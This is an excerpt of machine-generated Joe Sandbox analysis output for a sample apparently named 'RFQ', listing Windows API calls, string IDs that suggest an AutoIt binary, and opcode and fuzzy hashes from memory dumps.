                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                          • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                                                          • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                          • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ClearVariant
                                                                          • String ID:
                                                                          • API String ID: 1473721057-0
                                                                          • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                          • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                                                          • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                          • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove$_memcmp
                                                                          • String ID: '$\$h
                                                                          • API String ID: 2205784470-1303700344
                                                                          • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                                          • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                                                                          • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                                          • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                                                                          APIs
                                                                          • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                                                          • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                                                          • VariantClear.OLEAUT32 ref: 0045EA6D
                                                                          • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                                                          • __swprintf.LIBCMT ref: 0045EC33
                                                                          • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                                                          Strings
                                                                          • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                                                          • String ID: %4d%02d%02d%02d%02d%02d
                                                                          • API String ID: 2441338619-1568723262
                                                                          • Opcode ID: c256a0e8f79103727635468c6c39d920c699b266699b53e39892a4f9942b48fe
                                                                          • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                                                                          • Opcode Fuzzy Hash: c256a0e8f79103727635468c6c39d920c699b266699b53e39892a4f9942b48fe
                                                                          • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                                                                          APIs
                                                                          • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                                                          • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                                                          • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                                                          • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                                                          • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Interlocked$DecrementIncrement$Sleep
                                                                          • String ID: @COM_EVENTOBJ
                                                                          • API String ID: 327565842-2228938565
                                                                          • Opcode ID: 2d2e6611baaaed01bf0ac91f3b08fe096b6b0ff8b1e1267574a63fcd06cc1b28
                                                                          • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                                                                          • Opcode Fuzzy Hash: 2d2e6611baaaed01bf0ac91f3b08fe096b6b0ff8b1e1267574a63fcd06cc1b28
                                                                          • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                                                                          APIs
                                                                          • VariantClear.OLEAUT32(?), ref: 0047031B
                                                                          • VariantClear.OLEAUT32(?), ref: 0047044F
                                                                          • VariantInit.OLEAUT32(?), ref: 004704A3
                                                                          • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                                                                          • VariantClear.OLEAUT32(?), ref: 00470516
                                                                            • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                                                                          • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                                                            • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                                                                          • VariantClear.OLEAUT32(00000000), ref: 0047060D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$Clear$Copy$CallDispFuncInit
                                                                          • String ID: H
                                                                          • API String ID: 3613100350-2852464175
                                                                          • Opcode ID: a0993396c5b8998c97eda62eb292956ea80afa76050d6468dceab7f561fa4670
                                                                          • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                                                                          • Opcode Fuzzy Hash: a0993396c5b8998c97eda62eb292956ea80afa76050d6468dceab7f561fa4670
                                                                          • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                                                                          APIs
                                                                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                                                          • DestroyWindow.USER32(?), ref: 00426F50
                                                                          • UnregisterHotKey.USER32(?), ref: 00426F77
                                                                          • FreeLibrary.KERNEL32(?), ref: 0042701F
                                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                                          • String ID: close all
                                                                          • API String ID: 4174999648-3243417748
                                                                          • Opcode ID: 2f66c89a40f0e85c5d6dd4ec67defb2116834faec8b505cc193eeea2d12e665d
                                                                          • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                                                          • Opcode Fuzzy Hash: 2f66c89a40f0e85c5d6dd4ec67defb2116834faec8b505cc193eeea2d12e665d
                                                                          • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                                                          APIs
                                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                                                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                                                          • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                                                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                                                            • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                                          • String ID:
                                                                          • API String ID: 1291720006-3916222277
                                                                          • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                          • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                                                                          • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                          • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                                                                          APIs
                                                                          • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                                                          • IsMenu.USER32(?), ref: 0045FC5F
                                                                          • CreatePopupMenu.USER32 ref: 0045FC97
                                                                          • GetMenuItemCount.USER32(?), ref: 0045FCFD
                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                          • String ID: 0$2
                                                                          • API String ID: 93392585-3793063076
                                                                          • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                          • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                                                          • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                          • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                                                          APIs
                                                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                                                          • VariantClear.OLEAUT32(?), ref: 00435320
                                                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                                                          • VariantClear.OLEAUT32(?), ref: 004353B3
                                                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                                                          • String ID: crts
                                                                          • API String ID: 586820018-3724388283
                                                                          • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                          • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                                                                          • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                          • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                                                                          APIs
                                                                            • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                                                                          • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                                                                          • _wcscat.LIBCMT ref: 0044BCAF
                                                                          • _wcslen.LIBCMT ref: 0044BCBB
                                                                          • _wcslen.LIBCMT ref: 0044BCD1
                                                                          • SHFileOperationW.SHELL32(?), ref: 0044BD17
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                                          • String ID: \*.*
                                                                          • API String ID: 2326526234-1173974218
                                                                          • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                          • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                                                                          • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                          • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                                                                          APIs
                                                                            • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                                                          • _wcslen.LIBCMT ref: 004335F2
                                                                          • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                                                          • GetLastError.KERNEL32 ref: 0043362B
                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                                                          • _wcsrchr.LIBCMT ref: 00433666
                                                                            • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                                          • String ID: \
                                                                          • API String ID: 321622961-2967466578
                                                                          • Opcode ID: c150a4e9996d72ab87fed94048e5703dbc8ac01b5d1c28e2aacddbc68f85fc9a
                                                                          • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                                                          • Opcode Fuzzy Hash: c150a4e9996d72ab87fed94048e5703dbc8ac01b5d1c28e2aacddbc68f85fc9a
                                                                          • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: __wcsnicmp
                                                                          • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                          • API String ID: 1038674560-2734436370
                                                                          • Opcode ID: 7c13aa0513e4bb2138c96398a5a2566d58b08304d963883aeef11e8644bf4991
                                                                          • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                                                                          • Opcode Fuzzy Hash: 7c13aa0513e4bb2138c96398a5a2566d58b08304d963883aeef11e8644bf4991
                                                                          • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,004A7F6C), ref: 00434057
                                                                          • LoadStringW.USER32(00000000), ref: 00434060
                                                                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                                                          • LoadStringW.USER32(00000000), ref: 00434078
                                                                          • _wprintf.LIBCMT ref: 004340A1
                                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                                                          Strings
                                                                          • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: HandleLoadModuleString$Message_wprintf
                                                                          • String ID: %s (%d) : ==> %s: %s %s
                                                                          • API String ID: 3648134473-3128320259
                                                                          • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                          • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                                                          • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                          • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                                                          • __lock.LIBCMT ref: 00417981
                                                                            • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                                                            • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                                                            • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                                                          • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                                                          • __lock.LIBCMT ref: 004179A2
                                                                          • ___addlocaleref.LIBCMT ref: 004179C0
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                          • String ID: KERNEL32.DLL$pI
                                                                          • API String ID: 637971194-197072765
                                                                          • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                          • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                                                          • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
